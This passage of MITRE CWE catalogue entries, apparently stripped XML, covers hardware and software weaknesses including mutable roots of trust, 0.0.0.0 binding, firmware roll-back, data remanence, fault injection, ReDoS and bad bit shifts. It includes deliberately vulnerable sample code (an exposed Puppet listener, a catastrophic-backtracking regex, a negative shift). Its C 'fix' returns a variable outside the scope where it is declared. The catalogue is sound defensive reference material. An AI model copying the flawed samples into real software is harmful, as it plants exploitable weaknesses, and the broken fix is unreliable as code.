secure-boot flows. + One of the many ways RoT is achieved is by storing the code and data in memory or fuses. This memory should be immutable, i.e., once the RoT is programmed/provisioned in memory, that memory should be locked and prevented from further programming or writes. If the memory contents (i.e., RoT) are mutable, then an adversary can modify the RoT to execute their choice of code, resulting in a compromised secure boot. + Note that, for components like ROM, secure patching/update features should be supported to allow authenticated and authorized updates in the field. + + + + + + + + + + + + + + Architecture and Design + + + Implementation + Such issues could be introduced during policy definition, hardware architecture, design, manufacturing, and/or provisioning. They can be identified later during testing or system configuration phases. + + + + + Authentication + Authorization + Gain Privileges or Assume Identity + Execute Unauthorized Code or Commands + Modify Memory + High + + + + + Automated Dynamic Analysis + Automated testing can verify that RoT components are immutable. + High + + + Architecture or Design Review + Root of trust elements and memory should be part of architecture and design reviews. + High + + + + + Architecture and Design + When architecting the system, the RoT should be designated for storage in a memory that does not allow further programming/writes. + + + Implementation + During implementation and test, the RoT memory location should be demonstrated to not allow further programming/writes. + + + + + The RoT is stored in memory. This memory can be modified by an adversary. For example, if an SoC implements "Secure Boot" by storing the boot code in an off-chip/on-chip flash, the contents of the flash can be modified by using a flash programmer. Similarly, if the boot code is stored in ROM (Read-Only Memory) but the public key or the hash of the public key (used to enable "Secure Boot") is stored in Flash or a memory that is susceptible to modifications or writes, the implementation is vulnerable. + In general, if the boot code, key materials and data that enable "Secure Boot" are all mutable, the implementation is vulnerable. + Good architecture defines RoT as immutable in hardware. One of the best ways to achieve immutability is to store boot code, public key or hash of the public key and other relevant data in Read-Only Memory (ROM) or One-Time Programmable (OTP) memory that prevents further programming or writes. + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna + Intel Corporation + 2020-04-25 + 4.3 + 2020-12-10 + + + CWE Content Team + MITRE + 2021-10-28 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2022-04-28 + updated Applicable_Platforms, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2022-06-28 + updated Applicable_Platforms, Modes_of_Introduction + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product assigns the address 0.0.0.0 for a database server, a cloud service/instance, or any computing resource that communicates remotely. + + When a server binds to the address 0.0.0.0, it allows connections from every IP address on the local machine, effectively exposing the server to every possible network. This might be much broader access than intended by the developer or administrator, who might only be expecting the server to be reachable from a single interface/network. + + + + + + + + + + + + + + + System Configuration + + + + + Availability + DoS: Amplification + High + + + + + System Configuration + Assign IP addresses that are not 0.0.0.0. + High + + + System Configuration + Firewall + Unwanted connections to the configured server may be denied through a firewall or other packet filtering measures. + High + + + + + The following code snippet uses 0.0.0.0 in a Puppet script. + + signingserver::instance { + + "nightly-key-signing-server": + + listenaddr => "0.0.0.0", + port => "9100", + code_tag => "SIGNING_SERVER", + + } + + + The Puppet code snippet is used to provision a signing server that will use 0.0.0.0 to accept traffic. However, as 0.0.0.0 is unrestricted, malicious users may use this IP address to launch frequent requests and cause denial of service attacks. + + signingserver::instance { + + "nightly-key-signing-server": + + listenaddr => "127.0.0.1", + port => "9100", + code_tag => "SIGNING_SERVER", + + } + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Akond Rahman + Tennessee Technological University + 2020-09-08 + 4.3 + 2020-12-10 + + + CWE Content Team + MITRE + 2021-03-15 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Security-version number in hardware is mutable, resulting in the ability to downgrade (roll-back) the boot firmware to vulnerable code versions. + + A System-on-Chip (SoC) implements secure boot or verified boot. It might support a security version number, which prevents downgrading the current firmware to a vulnerable version. Once downgraded to a previous version, an adversary can launch exploits on the SoC and thus compromise the security of the SoC. These downgrade attacks are also referred to as roll-back attacks. + The security version number must be stored securely and persistently across power-on resets. A common weakness is that the security version number is modifiable by an adversary, allowing roll-back or downgrade attacks or, under certain circumstances, preventing upgrades (i.e. Denial-of-Service on upgrades). In both cases, the SoC is in a vulnerable state. + + + + + + + + + + + + + + + Architecture and Design + + + Implementation + Such issues could be introduced during hardware architecture and design, and can be identified later during testing or system configuration phases. + + + + + Confidentiality + Integrity + Authentication + Authorization + Other + High + Impact includes roll-back or downgrade to a vulnerable version of the firmware or DoS (prevent upgrades). + + + + + Automated Dynamic Analysis + Mutability of stored security version numbers and programming with older firmware images should be part of automated testing. + High + + + Architecture or Design Review + Anti-roll-back features should be reviewed as part of Architecture or Design review. + High + + + + + Architecture and Design + When architecting the system, security version data should be designated for storage in registers that are either read-only or have access controls that prevent modification by an untrusted agent. + + + Implementation + During implementation and test, security version data should be demonstrated to be read-only and access controls should be validated. + + + + + A new version of firmware is signed with a security version number higher than the previous version. During the firmware update process the SoC checks for the security version number and upgrades the SoC firmware with the latest version. This security version number is stored in persistent memory upon successful upgrade for use across power-on resets. + In general, if the security version number is mutable, the implementation is vulnerable. A mutable security version number allows an adversary to change the security version to a lower value to allow roll-back or to a higher value to prevent future upgrades. + The security version number should be stored in immutable hardware such as fuses, and the writes to these fuses should be highly access-controlled with appropriate authentication and authorization protections. + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna + Intel Corporation + 2020-04-25 + 4.3 + 2020-12-10 + + + CWE Content Team + MITRE + 2021-07-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2021-10-28 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2022-04-28 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2022-06-28 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product contains a component that cannot be updated or patched in order to remove vulnerabilities or significant bugs. + + + If the component is discovered to contain a vulnerability or critical bug, but the issue cannot be fixed using an update or patch, then the product's owner will not be able to protect against the issue. The only option might be replacement of the product, which could be too financially or operationally expensive for the product owner. As a result, the inability to patch or update can leave the product open to attacker exploitation or critical operation failures. This weakness can be especially difficult to manage when using ROM, firmware, or similar components that traditionally have had limited or no update capabilities. + + + In industries such as healthcare, "legacy" + devices can be operated for decades. As a + US task force report [REF-1197] notes, "the inability + to update or replace equipment has both + large and small health care delivery + organizations struggle with numerous + unsupported legacy systems that cannot + easily be replaced (hardware, software, and + operating systems) with large numbers of + vulnerabilities and few modern + countermeasures." + + + While hardware can be prone to this weakness, software systems can also be affected, such as when a third-party driver or library is no longer actively maintained or supported but is still critical for the required functionality. + + + + + + + + Primary + + + + + + + + + + + + Requirements + Requirements development might not consider the importance of updates over the lifetime of the product or might intentionally exclude this capability due to concerns such as expense or speed to market. + + + Architecture and Design + Lack of planning during architecture development and design, or external pressures such as speed to market, could ignore the capability to update. + + + Architecture and Design + Designers might omit capabilities for updating a component due to time pressures to release the product or assumptions about the stability of the component. + + + Implementation + The weakness can appear through oversight during implementation. + + + + + Confidentiality + Integrity + Access Control + Authentication + Authorization + Other + Gain Privileges or Assume Identity + Bypass Protection Mechanism + Execute Unauthorized Code or Commands + DoS: Crash, Exit, or Restart + Quality Degradation + Reduce Maintainability + If an attacker can identify an exploitable vulnerability in one product that has no means of patching, the attack may be used against all affected versions of that product. + + + + + Architecture or Design Review + Check the consumer or maintainer documentation, the architecture/design documentation, or the original requirements to ensure that the documentation includes details for how to update the firmware. + Moderate + + + + + Requirements + Specify requirements that each component should be updateable, including ROM, firmware, etc. + + + Architecture and Design + Design the product to allow for updating of its components. Include the external infrastructure that might be necessary to support updates, such as distribution servers. + + + Architecture and Design + Implementation + + With hardware, support patches that can be programmed in-field or during manufacturing through hardware fuses. This feature can be used for limited patching of devices after shipping, or for the next batch of silicon devices manufactured, without changing the full device ROM. + + Moderate + + Some parts of the hardware initialization or signature verification done to authenticate patches will always be "not patchable." Hardware-fuse-based patches will also have limitations in terms of size and the number of patches that can be supported. + + + + Implementation + Implement the necessary functionality to allow each component to be updated. + + + + + A refrigerator has an Internet interface for the official purpose of alerting the manufacturer when that refrigerator detects a fault. Because the device is attached to the Internet, the refrigerator is a target for hackers who may wish to use the device other potentially more nefarious purposes. + The refrigerator has no means of patching and is hacked becoming a spewer of email spam. + The device automatically patches itself and provides considerable more protection against being hacked. + + + + A System-on-Chip (SOC) implements a Root-of-Trust (RoT) in ROM to boot secure code. However, at times this ROM code might have security vulnerabilities and need to be patched. Since ROM is immutable, it can be impossible to patch. + + ROM does not have built-in application-programming interfaces (APIs) to patch if the code is vulnerable. Implement mechanisms to patch the vulnerable ROM code. + + + + + CVE-2020-9054 + Chain: network-attached storage (NAS) device has a critical OS command injection (CWE-78) vulnerability that is actively exploited to place IoT devices into a botnet, but some products are "end-of-support" and cannot be patched (CWE-1277). [REF-1097] + https://www.cve.org/CVERecord?id=CVE-2020-9054 + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2020-12-03 + 4.3 + 2020-12-10 + + + CWE Content Team + MITRE + 2021-07-20 + updated Demonstrative_Examples, Description, References + + + CWE Content Team + MITRE + 2022-04-28 + updated Common_Consequences, Description, Detection_Factors, Maintenance_Notes, Modes_of_Introduction, Observed_Examples, Potential_Mitigations, References, Relationships, Time_of_Introduction, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2023-01-31 + updated Applicable_Platforms, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Confidential information stored in memory circuits is readable or recoverable after being cleared or erased. + + Data remanence occurs when stored, memory content is not fully lost after a memory-clear or -erase operation. Confidential memory contents can still be readable through data remanence in the hardware. + Data remanence can occur because of performance optimization or memory organization during 'clear' or 'erase' operations, like a design that allows the memory-organization metadata (e.g., file pointers) to be erased without erasing the actual memory content. To protect against this weakness, memory devices will often support different commands for optimized memory erase and explicit secure erase. + Data remanence can also happen because of the physical properties of memory circuits in use. For example, static, random-access-memory (SRAM) and dynamic, random-access-memory (DRAM) data retention is based on the charge retained in the memory cell, which depends on factors such as power supply, refresh rates, and temperature. + Other than explicit erase commands, self-encrypting, secure-memory devices can also support secure erase through cryptographic erase commands. In such designs, only the decryption keys for encrypted data stored on the device are erased. That is, the stored data are always remnant in the media after a cryptographic erase. However, only the encrypted data can be extracted. Thus, protection against data recovery in such designs relies on the strength of the encryption algorithm. + + + + + + + + + + + + + + + Architecture and Design + + + Implementation + + + + + Confidentiality + Modify Memory + Read Memory + Confidential data are readable to untrusted agent. + + + + + Architecture or Design Review + + + Testing of memory-device contents after clearing or erase commands. + Dynamic analysis of memory contents during device operation to detect specific, confidential assets. + Architecture and design analysis of memory clear and erase operations. + + + + + Dynamic Analysis with Manual Results Interpretation + + + Testing of memory-device contents after clearing or erase commands. + Dynamic analysis of memory contents during device operation to detect specific, confidential assets. + Architecture and design analysis of memory clear and erase operations. + + + + + + + Architecture and Design + + + Support for secure-erase commands that apply multiple cycles of overwriting memory with known patterns and of erasing actual content. + Support for cryptographic erase in self-encrypting, memory devices. + External, physical tools to erase memory such as ultraviolet-rays-based erase of Electrically erasable, programmable, read-only memory (EEPROM). + Physical destruction of media device. This is done for repurposed or scrapped devices that are no longer in use. + + + + + + + Consider a device that uses flash memory for non-volatile-data storage. To optimize flash-access performance or reliable-flash lifetime, the device might limit the number of flash writes/erases by maintaining some state in internal SRAM and only committing changes to flash memory periodically. + The device also supports user reset to factory defaults with the expectation that all personal information is erased from the device after this operation. On factory reset, user files are erased using explicit, erase commands supported by the flash device. + In the given, system design, the flash-file system can support performance-optimized erase such that only the file metadata are erased and not the content. If this optimized erase is used for files containing user data during factory-reset flow, then device, flash memory can contain remanent data from these files. + On device-factory reset, the implementation might not erase these copies, since the file organization has changed and the flash file system does not have the metadata to track all previous copies. + A flash-memory region that is used by a flash-file system should be fully erased as part of the factory-reset flow. This should include secure-erase flow for the flash media such as overwriting patterns multiple times followed by erase. + + + + + CVE-2019-8575 + Firmware Data Deletion Vulnerability in which a base station factory reset might not delete all user information. The impact of this enables a new owner of a used device that has been "factory-default reset" with a vulnerable firmware version can still retrieve, at least, the previous owner's wireless network name, and the previous owner's wireless security (such as WPA2) key. This issue was addressed with improved, data deletion. + https://www.cve.org/CVERecord?id=CVE-2019-8575 + + + + + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Hareesh Khattri, Arun Kanuparthi, Parbati K. Manna + Intel Corporation + 2020-06-10 + 4.3 + 2020-12-10 + + + CWE Content Team + MITRE + 2022-04-28 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2022-06-28 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The Network On Chip (NoC) does not isolate or incorrectly isolates its on-chip-fabric and internal resources such that they are shared between trusted and untrusted agents, creating timing channels. + + Typically, network on chips (NoC) have many internal resources that are shared between packets from different trust domains. These resources include internal buffers, crossbars and switches, individual ports, and channels. The sharing of resources causes contention and introduces interference between differently trusted domains, which poses a security threat via a timing channel, allowing attackers to infer data that belongs to a trusted agent. This may also result in introducing network interference, resulting in degraded throughput and latency. + + + + + + + + + Primary + + + + + + + + + + + + "Network-on-chip" (NoC) is a commonly-used term used for hardware interconnect fabrics used by multicore Systems-on-Chip (SoC). Communication between modules on the chip uses packet-based methods, with improved efficiency and scalability compared to bus architectures [REF-1241]. + + + + + Architecture and Design + + + Implementation + + + + + Confidentiality + Availability + DoS: Resource Consumption (Other) + Varies by Context + Other + Medium + Attackers may infer data that belongs to a trusted agent. The methods used to perform this attack may result in noticeably increased resource consumption. + + + + + Manual Analysis + Providing marker flags to send through the interfaces coupled with examination of which users are able to read or manipulate the flags will help verify that the proper isolation has been achieved and is effective. + Moderate + + + + + Architecture and Design + Implementation + Implement priority-based arbitration inside the NoC and have dedicated buffers or virtual channels for routing secret data from trusted agents. + + + + + Consider a NoC that implements a one-dimensional mesh network with four nodes. This supports two flows: Flow A from node 0 to node 3 (via node 1 and node 2) and Flow B from node 1 to node 2. Flows A and B share a common link between Node 1 and Node 2. Only one flow can use the link in each cycle. + One of the masters to this NoC implements a cryptographic algorithm (RSA), and another master to the NoC is a core that can be exercised by an attacker. The RSA algorithm performs a modulo multiplication of two large numbers and depends on each bit of the secret key. The algorithm examines each bit in the secret key and only performs multiplication if the bit is 1. This algorithm is known to be prone to timing attacks. Whenever RSA performs multiplication, there is additional network traffic to the memory controller. One of the reasons for this is cache conflicts. + Since this is a one-dimensional mesh, only one flow can use the link in each cycle. Also, packets from the attack program and the RSA program share the output port of the network-on-chip. This contention results in network interference, and the throughput and latency of one flow can be affected by the other flow's demand. + + The attacker runs a loop program on the core they control, and this causes a cache miss in every iteration for the RSA algorithm. Thus, by observing network-traffic bandwidth and timing, the attack program can determine when the RSA algorithm is doing a multiply operation (i.e., when the secret key bit is 1) and eventually extract the entire, secret key. + There may be different ways to fix this particular weakness. + + Implement priority-based arbitration inside the NoC and have dedicated buffers or virtual channels for routing secret data from trusted agents. + + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Arun Kanuparthi, Hareesh Khattri, Parbati K. Manna + Intel Corporation + 2020-05-23 + 4.3 + 2020-12-10 + + + CWE Content Team + MITRE + 2021-10-28 + updated Background_Details, Demonstrative_Examples, Description, Detection_Factors, Name, References, Relationships, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2022-04-28 + updated Applicable_Platforms, References + + + CWE Content Team + MITRE + 2022-06-28 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + Hareesh Khattri + Intel Corporation + 2021-10-22 + provided references and background information + + Improper Isolation of Shared Resources in Network On Chip + + + + The device is missing or incorrectly implements circuitry or sensors that detect and mitigate the skipping of security-critical CPU instructions when they occur. + + The operating conditions of hardware may change + in ways that cause unexpected behavior to occur, + including the skipping of security-critical CPU + instructions. Generally, this can occur due to + electrical disturbances or when the device operates + outside of its expected conditions. + In practice, application code may contain + conditional branches that are security-sensitive (e.g., + accepting or rejecting a user-provided password). These + conditional branches are typically implemented by a + single conditional branch instruction in the program + binary which, if skipped, may lead to effectively + flipping the branch condition - i.e., causing the wrong + security-sensitive branch to be taken. This affects + processes such as firmware authentication, password + verification, and other security-sensitive decision + points. + Attackers can use fault injection techniques to + alter the operating conditions of hardware so that + security-critical instructions are skipped more + frequently or more reliably than they would in a + "natural" setting. + + + + + + + + Primary + + + + + + + + + + + Architecture and Design + Failure to design appropriate countermeasures to common fault injection techniques can manifest this weakness. + + + Implementation + This weakness can arise if the hardware design incorrectly implements countermeasures to prevent fault injection. + + + + + Confidentiality + Integrity + Authentication + Bypass Protection Mechanism + Alter Execution Logic + Unexpected State + High + Depending on the context, instruction skipping can + have a broad range of consequences related to the + generic bypassing of security critical code. + + + + + Automated Static Analysis + This weakness can be found using automated static analysis once a developer has indicated which code paths are critical to protect. + Moderate + + + Simulation / Emulation + This weakness can be found using automated dynamic analysis. Both emulation of a CPU with instruction skips, as well as RTL simulation of a CPU IP, can indicate parts of the code that are sensitive to faults due to instruction skips. + Moderate + + + Manual Analysis + This weakness can be found using manual (static) analysis. The analyst has security objectives that are matched against the high-level code. This method is less precise than emulation, especially if the analysis is done at the higher level language rather than at assembly level. + Moderate + + + + + Architecture and Design + Design strategies for ensuring safe failure if + inputs, such as Vcc, are modified out of acceptable + ranges. + + + Architecture and Design + Design strategies for ensuring safe behavior if + instructions attempt to be skipped. + + + Architecture and Design + Identify mission critical secrets that should + be wiped if faulting is detected, and design a + mechanism to do the deletion. + + + Implementation + Add redundancy by performing an operation + multiple times, either in space or time, and perform + majority voting. Additionally, make conditional + instruction timing unpredictable. + + + Implementation + Use redundant operations or canaries to + detect and respond to faults. + + + Implementation + Ensure that fault mitigations are strong enough + in practice. For example, a low power detection + mechanism that takes 50 clock cycles to trigger at lower + voltages may be an insufficient security mechanism if + the instruction counter has already progressed with no + other CPU activity occurring. + + + + + A smart card contains authentication credentials that are used as authorization to enter a building. The credentials are only accessible when a correct PIN is presented to the card. + + The card emits the credentials when a voltage anomaly is injected into the power line to the device at a particular time after providing an incorrect PIN to the card, causing the internal program to accept the incorrect PIN. + There are several ways this weakness could be fixed. + + add an internal filter or internal power supply in series with the power supply pin on the device + add sensing circuitry to reset the device if out of tolerance conditions are detected + add additional execution sensing circuits to monitor the execution order for anomalies and abort the action or reset the device under fault conditions + + + + + + + CVE-2019-15894 + fault injection attack bypasses the verification mode, potentially allowing arbitrary code execution. + https://www.cve.org/CVERecord?id=CVE-2019-15894 + + + + Power + + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Jasper van Woudenberg + Riscure + 2020-10-14 + 4.3 + 2020-12-10 + + + Jasper van Woudenberg + Riscure + 2021-01-11 + + + CWE Content Team + MITRE + 2021-03-15 + updated Description, Functional_Areas, Potential_Mitigations, References + + + CWE Content Team + MITRE + 2021-10-28 + updated Demonstrative_Examples, Description, Detection_Factors, Maintenance_Notes, Name, Observed_Examples, Potential_Mitigations, References, Relationships, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2022-04-28 + updated Potential_Mitigations, References, Relationships + + + CWE Content Team + MITRE + 2022-06-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated References + + + CWE Content Team + MITRE + 2023-01-31 + updated Potential_Mitigations, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + Jasper van Woudenberg + Riscure + 2021-10-11 + Provided detection methods and feedback on demonstrative example + + Insufficient Protection Against Instruction Skipping Via Fault Injection + + + + The product uses a regular expression with an inefficient, possibly exponential worst-case computational complexity that consumes excessive CPU cycles. + Some regular expression engines have a feature called "backtracking". If the token cannot match, the engine "backtracks" to a position that may result in a different token that can match. + Backtracking becomes a weakness if all of these conditions are met: + + The number of possible backtracking attempts are exponential relative to the length of the input. + The input can fail to match the regular expression. + The input can be long enough. + + + Attackers can create crafted inputs that + intentionally cause the regular expression to use + excessive backtracking in a way that causes the CPU + consumption to spike. + + + + + + + + + + + + ReDoS + ReDoS is an abbreviation of "Regular expression Denial of Service". + + + Regular Expression Denial of Service + While this term is attack-focused, this is commonly used to describe the weakness. + + + Catastrophic backtracking + This term is used to describe the behavior of the regular expression as a negative technical impact. + + + + + Implementation + A RegEx can be easy to create and read using unbounded matching characters, but the programmer might not consider the risk of excessive backtracking. + + + High + + + Availability + DoS: Resource Consumption (CPU) + High + + + + + Architecture and Design + Use regular expressions that do not support backtracking, e.g. by removing nested quantifiers. + High + This is one of the few effective solutions when using user-provided regular expressions. + + + System Configuration + Set backtracking limits in the configuration of the regular expression implementation, such as PHP's pcre.backtrack_limit. Also consider limits on execution time for the process. + Moderate + + + Implementation + Do not use regular expressions with untrusted input. If regular expressions must be used, avoid using backtracking in the expression. + High + + + Implementation + Limit the length of the input that the regular expression will process. + Moderate + + + + + This example attempts to check if an input string is a "sentence" [REF-1164]. + + var test_string = "Bad characters: $@#"; + var bad_pattern = /^(\w+\s?)*$/i; + var result = test_string.search(bad_pattern); + + The regular expression has a vulnerable backtracking clause inside (\w+\s?)*$ which can be triggered to cause a Denial of Service by processing particular phrases. + To fix the backtracking problem, backtracking is removed with the ?= portion of the expression which changes it to a lookahead and the \2 which prevents the backtracking. The modified example is: + + var test_string = "Bad characters: $@#"; + var good_pattern = /^((?=(\w+))\2\s?)*$/i; + var result = test_string.search(good_pattern); + + Note that [REF-1164] has a more thorough (and lengthy) explanation of everything going on within the RegEx. + + + This example attempts to check if an input string is a "sentence" and is modified for Perl [REF-1164]. + + my $test_string = "Bad characters: \$\@\#"; + my $bdrslt = $test_string; + $bdrslt =~ /^(\w+\s?)*$/i; + + The regular expression has a vulnerable backtracking clause inside (\w+\s?)*$ which can be triggered to cause a Denial of Service by processing particular phrases. + To fix the backtracking problem, backtracking is removed with the ?= portion of the expression which changes it to a lookahead and the \2 which prevents the backtracking. The modified example is: + + my $test_string = "Bad characters: \$\@\#"; + my $gdrslt = $test_string; + $gdrslt =~ /^((?=(\w+))\2\s?)*$/i; + + Note that [REF-1164] has a more thorough (and lengthy) explanation of everything going on within the RegEx. + + + + + CVE-2020-5243 + server allows ReDOS with crafted User-Agent strings, due to overlapping capture groups that cause excessive backtracking. + https://www.cve.org/CVERecord?id=CVE-2020-5243 + + + CVE-2021-21317 + npm package for user-agent parser prone to ReDoS due to overlapping capture groups + https://www.cve.org/CVERecord?id=CVE-2021-21317 + + + CVE-2019-16215 + Markdown parser uses inefficient regex when processing a message, allowing users to cause CPU consumption and delay preventing processing of other messages. + https://www.cve.org/CVERecord?id=CVE-2019-16215 + + + CVE-2019-6785 + Long string in a version control product allows DoS due to an inefficient regex. + https://www.cve.org/CVERecord?id=CVE-2019-6785 + + + CVE-2019-12041 + Javascript code allows ReDoS via a long string due to excessive backtracking. + https://www.cve.org/CVERecord?id=CVE-2019-12041 + + + CVE-2015-8315 + ReDoS when parsing time. + https://www.cve.org/CVERecord?id=CVE-2015-8315 + + + CVE-2015-8854 + ReDoS when parsing documents. + https://www.cve.org/CVERecord?id=CVE-2015-8854 + + + CVE-2017-16021 + ReDoS when validating URL. + https://www.cve.org/CVERecord?id=CVE-2017-16021 + + + + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Anonymous External Contributor + 2021-01-17 + 4.4 + 2021-03-15 + + + CWE Content Team + MITRE + 2021-07-20 + updated References + + + CWE Content Team + MITRE + 2021-10-28 + updated Description + + + CWE Content Team + MITRE + 2022-04-28 + updated Observed_Examples, Potential_Mitigations + + + CWE Content Team + MITRE + 2022-10-13 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Demonstrative_Examples, Observed_Examples + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + An unauthorized agent can inject errors into a redundant block to deprive the system of redundancy or put the system in a degraded operating mode. + + To ensure the performance and functional reliability of certain components, hardware designers can implement hardware blocks for redundancy in the case that others fail. This redundant block can be prevented from performing as intended if the design allows unauthorized agents to inject errors into it. In this way, a path with injected errors may become unavailable to serve as a redundant channel. This may put the system into a degraded mode of operation which could be exploited by a subsequent attack. + + + + + + + + + + + + + Architecture and Design + Such issues could be introduced during hardware architecture and design and identified later during Testing or System Configuration phases. + + + Implementation + Such issues could be introduced during implementation and identified later during Testing or System Configuration phases. + + + Integration + Such issues could be introduced during integration and identified later during Testing or System Configuration phases. + + + + + Integrity + Availability + DoS: Crash, Exit, or Restart + DoS: Instability + Quality Degradation + DoS: Resource Consumption (CPU) + DoS: Resource Consumption (Memory) + DoS: Resource Consumption (Other) + Reduce Performance + Reduce Reliability + Unexpected State + + + + + Architecture and Design + Ensure the design does not allow error injection in modes intended for normal run-time operation. Provide access controls on interfaces for injecting errors. + + + Implementation + Disallow error injection in modes which are expected to be used for normal run-time operation. Provide access controls on interfaces for injecting errors. + + + Integration + Add an access control layer atop any unprotected interfaces for injecting errors. + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + James Pangburn + Accellera IP Security Assurance (IPSA) Working Group + 2020-07-29 + 4.3 + 2020-12-10 + + + CWE Content Team + MITRE + 2023-01-31 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + An integer value is specified to be shifted by a negative amount or an amount greater than or equal to the number of bits contained in the value causing an unexpected or indeterminate result. + + Specifying a value to be shifted by a negative amount is undefined in various languages. Various computer architectures implement this action in different ways. The compilers and interpreters when generating code to accomplish a shift generally do not do a check for this issue. + Specifying an over-shift, a shift greater than or equal to the number of bits contained in a value to be shifted, produces a result which varies by architecture and compiler. In some languages, this action is specifically listed as producing an undefined result. + + + + + + + + + + + + + + + + Implementation + Adding shifts without properly verifying the size and sign of the shift amount. + + + + + Integrity + DoS: Crash, Exit, or Restart + + + + + Implementation + Implicitly or explicitly add checks and mitigation for negative or over-shift values. + + + + + + A negative shift amount for an x86 or x86_64 shift instruction will produce the number of bits to be shifted by taking a 2's-complement of the shift amount and effectively masking that amount to the lowest 6 bits for a 64 bit shift instruction. + + + unsigned int r = 1 << -5; + + The example above ends up with a shift amount of -5. The hexadecimal value is FFFFFFFFFFFFFFFD which, when bits above the 6th bit are masked off, the shift amount becomes a binary shift value of 111101 which is 61 decimal. A shift of 61 produces a very different result than -5. The previous example is a very simple version of the following code which is probably more realistic of what happens in a real system. + + int choose_bit(int reg_bit, int bit_number_from_elsewhere) + { + + if (NEED_TO_SHIFT) + { + + reg_bit -= bit_number_from_elsewhere; + + } + return reg_bit; + + } + unsigned int handle_io_register(unsigned int *r) + { + + unsigned int the_bit = 1 << choose_bit(5, 10); + *r |= the_bit; + return the_bit; + + } + + + int choose_bit(int reg_bit, int bit_number_from_elsewhere) + { + + if (NEED_TO_SHIFT) + { + + reg_bit -= bit_number_from_elsewhere; + + } + return reg_bit; + + } + + unsigned int handle_io_register(unsigned int *r) + { + + int the_bit_number = choose_bit(5, 10); + if ((the_bit_number > 0) && (the_bit_number < 63)) + { + + unsigned int the_bit = 1 << the_bit_number; + *r |= the_bit; + + } + return the_bit; + + } + + Note that the good example not only checks for negative shifts and disallows them, but it also checks for over-shifts. No bit operation is done if the shift is out of bounds. Depending on the program, perhaps an error message should be logged. + + + + + CVE-2009-4307 + An unexpected large value in the ext4 filesystem causes an overshift condition resulting in a divide by zero. + https://www.cve.org/CVERecord?id=CVE-2009-4307 + + + CVE-2012-2100 + An unexpected large value 